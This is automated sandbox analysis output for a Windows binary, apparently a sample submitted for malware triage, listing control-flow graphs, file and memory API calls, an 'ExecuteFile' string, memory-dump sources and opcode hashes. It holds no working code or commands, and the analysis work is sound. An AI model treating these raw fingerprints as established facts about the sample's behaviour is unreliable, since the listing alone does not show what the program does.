                                                                control_flow_graph 1308 404a44-404a62 call 408676 ??2@YAPAXI@Z 1311 404a64-404a6b call 40a9f8 1308->1311 1312 404a6d 1308->1312 1314 404a6f-404a91 call 408726 call 40dcfb 1311->1314 1312->1314 1341 404a92 call 40b2fc 1314->1341 1342 404a92 call 40a7de 1314->1342 1319 404a95-404a97 1320 404ab3-404abd 1319->1320 1321 404a99-404aa9 call 407776 1319->1321 1323 404ada-404ae4 ??2@YAPAXI@Z 1320->1323 1324 404abf-404ac1 call 403354 1320->1324 1337 404aae-404ab2 1321->1337 1325 404ae6-404aed call 404292 1323->1325 1326 404aef 1323->1326 1331 404ac6-404ac9 1324->1331 1330 404af1-404af6 call 40150b 1325->1330 1326->1330 1336 404afb-404afd 1330->1336 1331->1323 1335 404acb 1331->1335 1338 404ad0-404ad8 1335->1338 1336->1338 1338->1337 1341->1319 1342->1319
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,00000015,?,00405D20,?,00417788,00417788), ref: 00404A5A
                                                                • ??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??2@
                                                                • String ID: ExecuteFile
                                                                • API String ID: 1033339047-323923146
                                                                • Opcode ID: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                                                • Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
                                                                • Opcode Fuzzy Hash: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                                                • Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1343 40adc3-40adce 1344 40add0-40add3 1343->1344 1345 40ae0d-40ae0f 1343->1345 1346 40add5-40ade3 ??2@YAPAXI@Z 1344->1346 1347 40adfb 1344->1347 1348 40adfd-40ae0c ??3@YAXPAX@Z 1346->1348 1349 40ade5-40ade7 1346->1349 1347->1348 1348->1345 1350 40ade9 1349->1350 1351 40adeb-40adf9 memmove 1349->1351 1350->1351 1351->1348
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                • memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??2@??3@memmove
                                                                • String ID:
                                                                • API String ID: 3828600508-0
                                                                • Opcode ID: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                                                • Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
                                                                • Opcode Fuzzy Hash: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                                                • Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A
                                                                APIs
                                                                • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: GlobalMemoryStatus
                                                                • String ID: @
                                                                • API String ID: 1890195054-2766056989
                                                                • Opcode ID: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                                                • Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
                                                                • Opcode Fuzzy Hash: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                                                • Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D
                                                                APIs
                                                                  • Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5
                                                                  • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                  • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                  • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@$??2@ExceptionThrowmemmove
                                                                • String ID:
                                                                • API String ID: 4269121280-0
                                                                • Opcode ID: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                                                • Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
                                                                • Opcode Fuzzy Hash: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                                                • Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@H_prolog
                                                                • String ID:
                                                                • API String ID: 1329742358-0
                                                                • Opcode ID: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                                • Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
                                                                • Opcode Fuzzy Hash: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                                • Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??2@??3@
                                                                • String ID:
                                                                • API String ID: 1936579350-0
                                                                • Opcode ID: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
                                                                • Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
                                                                • Opcode Fuzzy Hash: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
                                                                • Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754
                                                                APIs
                                                                • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ErrorFileLastPointer
                                                                • String ID:
                                                                • API String ID: 2976181284-0
                                                                • Opcode ID: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                                                • Instruction ID: d86f9e507f4e039952bd1031b0dc001be1b0661bb6f0ed5f18f0f7cd7a7605a3
                                                                • Opcode Fuzzy Hash: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                                                • Instruction Fuzzy Hash: FCF0B2B8A04208FFCB04CFA8D8448AE7BB9EB49314B2085A9F815A7390D735DA04DF64
                                                                APIs
                                                                • SysAllocString.OLEAUT32(?), ref: 0040ED05
                                                                • _CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: AllocExceptionStringThrow
                                                                • String ID:
                                                                • API String ID: 3773818493-0
                                                                • Opcode ID: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                                                • Instruction ID: 896a1b371a95ab63a3f889c911e7bff8eb1facf706b7c8fcc1dab20228dace7a
                                                                • Opcode Fuzzy Hash: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                                                • Instruction Fuzzy Hash: CDE06D71600309ABDB10AF66D8419D67BE8EF00380B00C83FF948CA250E779E590C7D9
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?), ref: 0040E745
                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterLeave
                                                                • String ID:
                                                                • API String ID: 3168844106-0
                                                                • Opcode ID: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                                                • Instruction ID: 086d926b78662e0ab04275255430a857868cdabe8091615e808f779c17768b54
                                                                • Opcode Fuzzy Hash: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                                                • Instruction Fuzzy Hash: 76F05436200214FBCB119F95DC08E9BBBB9FF49761F14842AF945E7260C771E821DBA4
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: H_prolog
                                                                • String ID:
                                                                • API String ID: 3519838083-0
                                                                • Opcode ID: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                                • Instruction ID: 39d544f4fee3d18347c8ea8d59cce7c7d4ef222c74644271f89bd24cd9d44c54
                                                                • Opcode Fuzzy Hash: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                                • Instruction Fuzzy Hash: 4B2180316003099BCB14EFA5C945AAE73B5EF40344F14843EF806BB291DB38DD16CB1A
                                                                APIs
                                                                • SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                                • Instruction ID: 5817d5120c2da98d16edaa91ace5ca285f5b3ff1e58b2ffd557e42fef7bfdc6e
                                                                • Opcode Fuzzy Hash: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                                • Instruction Fuzzy Hash: 66F05E72100201DBC720AF98C840BA777F5BB84314F04483EE583F2AA0D778B885CB59
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: H_prolog
                                                                • String ID:
                                                                • API String ID: 3519838083-0
                                                                • Opcode ID: 05aa82fd4493c2954843b58147a6e12e638aaadf2772ca9641b0bace8f10624d
                                                                • Instruction ID: 375caa893e42e0daca7b158ffe4b4b415bc54d3572d418f3e5e61c8e5be1c541
                                                                • Opcode Fuzzy Hash: 05aa82fd4493c2954843b58147a6e12e638aaadf2772ca9641b0bace8f10624d
                                                                • Instruction Fuzzy Hash: 30F0F272500109BBCF029F85D901AEEBB36EB48354F00811ABA1161160D33A9961AB99
                                                                APIs
                                                                  • Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: CloseCreateFileHandle
                                                                • String ID:
                                                                • API String ID: 3498533004-0
                                                                • Opcode ID: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                                                • Instruction ID: 040011ad7fb3de3f437c6c7e3ebc1dcda5640d8293b7e84d035d3e38099293ab
                                                                • Opcode Fuzzy Hash: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                                                • Instruction Fuzzy Hash: A1E04F32140219ABCF215FA49C01BCA7B96AF09760F144526BE11A61E0C672D465AF94
                                                                APIs
                                                                • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: FileWrite
                                                                • String ID:
                                                                • API String ID: 3934441357-0
                                                                • Opcode ID: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                                                • Instruction ID: ec3d056ad33d5175d1bee219b94afd5900c8108b90431a53c6143dcb1d381838
                                                                • Opcode Fuzzy Hash: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                                                • Instruction Fuzzy Hash: D7E0C275600208FBCB00CF95C801B9E7BBABB49755F10C069F918AA2A0D739AA10DF54
                                                                APIs
                                                                • _beginthreadex.MSVCRT ref: 00406552
                                                                  • Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_beginthreadex
                                                                • String ID:
                                                                • API String ID: 4034172046-0
                                                                • Opcode ID: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                                                • Instruction ID: fe95790bd269afcad05a26a3721163fc0b830ac61c9b3c5b6bbddf8a66cf2d64
                                                                • Opcode Fuzzy Hash: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                                                • Instruction Fuzzy Hash: 12D05EF6400208BFDF01DFE0DC05CAB3BADEB08204B004464FD05C2150E632DA108B60
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: H_prolog
                                                                • String ID:
                                                                • API String ID: 3519838083-0
                                                                • Opcode ID: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                                                • Instruction ID: 312fbe8762c42e8d4a239ae194adb86e93363bc1e5443e54fb58aca6058f63a2
                                                                • Opcode Fuzzy Hash: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                                                • Instruction Fuzzy Hash: 70D05EB2A04108FBE7109F85D946BEEFB78EB80399F10823FB506B1150D7BC5A0196AD
                                                                APIs
                                                                • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                                • Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
                                                                • Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                                • Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54
                                                                APIs
                                                                • SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: FileTime
                                                                • String ID:
                                                                • API String ID: 1425588814-0
                                                                • Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                                • Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
                                                                • Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                                • Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: memmove
                                                                • String ID:
                                                                • API String ID: 2162964266-0
                                                                • Opcode ID: 97bd8de7a7fe9ad43a3345e9333d2138b4beb196f0434672ce39f7d09e0e15cd
                                                                • Instruction ID: f56dbf57367ec124b55c1fed62106b1dafce564086f6503587e0b0fbfa293862
                                                                • Opcode Fuzzy Hash: 97bd8de7a7fe9ad43a3345e9333d2138b4beb196f0434672ce39f7d09e0e15cd
                                                                • Instruction Fuzzy Hash: EA21A271A00B009FC724CFAAC88485BF7F9FF88724764896EE49A93A40E774B945CB54
                                                                APIs
                                                                • _CxxThrowException.MSVCRT(?,00414F84), ref: 0040E616
                                                                Memory Dump Source
